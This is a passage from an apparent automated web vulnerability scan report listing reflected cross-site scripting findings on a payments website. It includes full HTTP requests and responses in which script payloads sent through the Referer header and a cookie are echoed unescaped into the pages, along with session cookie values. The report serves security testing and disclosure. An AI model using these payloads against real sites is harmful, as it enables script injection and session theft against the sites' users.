Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=8809e--><script>alert(1)</script>275e11ad70b

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:27 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=TDJVadNr8+ViGI-INyH2Zw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:28 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D33000A0805192AA117E3C409CD4F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 98228

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=8809e--><script>alert(1)</script>275e11ad70b | -->
...[SNIP]...

1.62. http://payments.intuit.com/support/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dceb5'-alert(1)-'94b519c31b1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=dceb5'-alert(1)-'94b519c31b1

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:12 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=UGJvXvyLwdoaSfkAAlbu1A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:13 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CFABC0A0805192AA117E39292EB50
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 98195

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=dceb5'-alert(1)-'94b519c31b1';
                   </script>
...[SNIP]...

1.63. http://payments.intuit.com/support/glossary.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/glossary.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef888'-alert(1)-'bf789d01126 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ef888'-alert(1)-'bf789d01126

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:54 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=3dnIEVlZcZgtxMibVwZkxA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:55 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CB3660A0805192AA117E30609CB68
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=glossary_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140104

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=ef888'-alert(1)-'bf789d01126';
                   </script>
...[SNIP]...

1.64. http://payments.intuit.com/support/glossary.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/glossary.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 93b01--><script>alert(1)</script>d9ed33811bf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=93b01--><script>alert(1)</script>d9ed33811bf

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:05 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=g1QXXAHB2GhfRtmgIA-0mQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:06 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CDE020A0805192AA117E34818FE92
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=glossary_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140135

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=93b01--><script>alert(1)</script>d9ed33811bf | -->
...[SNIP]...

1.65. http://payments.intuit.com/ [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262dd"><script>alert(1)</script>f39fea87c00 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?launchHelpMeChoose=true HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16262dd"><script>alert(1)</script>f39fea87c00;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:54:08 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=gEMO0Uj6PkBJ7DxotzGYwA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:31:09 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95680780A0805192AA117E3A2F56F6B
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108446

...[SNIP]...
<input id="testGroup" value="T16262dd"><script>alert(1)</script>f39fea87c00" type="hidden" />
...[SNIP]...

1.66. http://payments.intuit.com/ [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 54b80<script>alert(1)</script>618aff7c52b was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?launchHelpMeChoose=true HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1654b80<script>alert(1)</script>618aff7c52b;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:55:31 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=EB3K6xHPm8Z4gMMc+8FP8A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:32:32 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D957C7D80A0805192AA117E33B1438DB
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108431

...[SNIP]...
<br />
       A/B Test Group: T1654b80<script>alert(1)</script>618aff7c52b<br />
...[SNIP]...

1.67. http://payments.intuit.com/apply-now/ [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bfc"><script>alert(1)</script>2691f2a62ad was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e3bfc"><script>alert(1)</script>2691f2a62ad;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=mj0unVAWHa0hO+XWAF87xQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E35820A0805192AA117E3A09F0E66
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 128379

...[SNIP]...
<input id="testGroup" value="T16e3bfc"><script>alert(1)</script>2691f2a62ad" type="hidden" />
...[SNIP]...

1.68. http://payments.intuit.com/apply-now/ [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload b8e7d<script>alert(1)</script>1a9cb1ed9ff was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16b8e7d<script>alert(1)</script>1a9cb1ed9ff;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:17 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
